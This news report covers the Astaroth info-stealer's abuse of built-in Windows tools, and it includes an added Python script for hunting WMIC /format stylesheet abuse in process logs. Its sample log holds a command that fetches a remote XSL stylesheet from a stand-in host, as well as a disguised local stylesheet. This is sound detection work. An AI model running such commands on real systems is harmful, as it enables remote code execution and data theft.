Astaroth, an info-stealing malware campaign whose operators abuse legitimate, built-in Windows tools rather than dropping their own executables, has retooled after Microsoft drew attention to its living-off-the-land techniques last July. In February the campaign stepped up its activity with even stealthier methods.
Last year the Windows Defender ATP team detected a sudden, massive spike in the use of the Windows Management Instrumentation Command-line tool (WMIC, wmic.exe), a utility built into Windows.
Microsoft's investigation traced the spike to a large spam campaign sending emails with a link to a website hosting a .LNK shortcut file. If a recipient downloaded and opened the shortcut, it launched WMIC with its /format switch pointed at a remote XSL stylesheet, which in turn chained several other built-in Windows tools to download and execute the remaining stages. The final payload ran only in memory, never touching disk as a file, so traditional file-scanning antivirus had nothing to inspect.
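The WMIC abuse described above is easy to hunt for in process-creation telemetry: legitimate WMIC invocations use the stock output formats, while the Astaroth chain passed /format: a URL (or a local file that is not one of the stock stylesheets). The following script is an added example, not code from the article or from Microsoft. It assumes a simplified, constructed log format of `parent_image|image|command_line` per line (real Sysmon Event ID 1 or Windows Event ID 4688 records would need their own parsing), a hypothetical host name `example.invalid`, and an assumed allowlist of built-in format keywords that should be checked against the wbem directory of the environment being monitored.

```python
"""Hunt process-creation events for WMIC /format stylesheet abuse
(MITRE ATT&CK T1220, XSL Script Processing), the technique the original
Astaroth chain used to go from a .LNK shortcut to in-memory execution.

Added example; not the article's or Microsoft's code.
"""
import re
from typing import Dict, Iterable, List, Optional

# Assumed allowlist: keywords WMIC treats as its own stock output formats
# (most map to .xsl files shipped in %SystemRoot%\System32\wbem). Adjust to
# what actually ships on the systems you monitor.
BUILTIN_FORMATS = {
    "list", "table", "csv", "hform", "htable", "htable-sortby", "mof",
    "rawxml", "xml", "value", "textvaluelist", "texttable", "texttablewsys",
}
WBEM_DIR = "\\system32\\wbem\\"          # compared lower-cased
# /format:<value>, where <value> may be quoted ("...") or a bare token.
FORMAT_RE = re.compile(r'/format:\s*(?:"([^"]*)"|(\S+))', re.IGNORECASE)
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://")


def classify_wmic_cmdline(cmdline: str) -> Optional[str]:
    """Return a finding label for a wmic.exe command line, or None if benign."""
    m = FORMAT_RE.search(cmdline)
    if not m:
        return None                       # no stylesheet requested at all
    target = (m.group(1) if m.group(1) is not None else m.group(2)).strip().lower()
    if SCHEME_RE.match(target):
        # WMIC will fetch and execute a stylesheet from a remote server.
        return "remote XSL via /format (T1220)"
    if target in BUILTIN_FORMATS:
        return None                       # stock output format, expected
    if WBEM_DIR not in target and ("\\" in target or "/" in target or "." in target):
        # A file path outside the wbem directory: WMIC accepts any file that
        # contains XSL, regardless of its extension.
        return "non-standard local stylesheet via /format (T1220)"
    return None


def scan_events(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Apply classify_wmic_cmdline to every wmic.exe process-creation event."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        parent, image, cmdline = line.split("|", 2)
        if not image.lower().endswith("\\wmic.exe"):
            continue
        label = classify_wmic_cmdline(cmdline)
        if label:
            findings.append({"parent": parent, "cmdline": cmdline, "finding": label})
    return findings


# Constructed sample log (not real telemetry): parent_image|image|command_line.
# explorer.exe as the parent is what a user double-clicking a .LNK produces.
SAMPLE_EVENTS = r"""
C:\Windows\explorer.exe|C:\Windows\System32\wbem\WMIC.exe|wmic os get /format:"https://example.invalid/v.xsl"
C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic process list brief
C:\Windows\System32\cmd.exe|C:\Windows\System32\wbem\WMIC.exe|wmic os get /format:csv
C:\Windows\explorer.exe|C:\Windows\System32\wbem\WMIC.exe|wmic os get /format:"C:\Users\Public\update.txt"
C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe
"""

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS.splitlines()):
        print(f"{f['finding']}: parent={f['parent']} cmdline={f['cmdline']}")
```

Of the five constructed events, two are flagged: the remote-stylesheet launch and the local stylesheet disguised as a .txt file. The two ordinary WMIC invocations and the notepad event pass. In a real deployment the same logic belongs in a detection rule keyed on the process image, with the parent-process field used to raise the severity when the chain starts from explorer.exe or an Office application rather than from an administrator's shell.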
"Astaroth now completely avoids the use of WMIC and related techniques to bypass existing detections," Hardik Suri of the Microsoft Defender ATP Research Team said in a new update.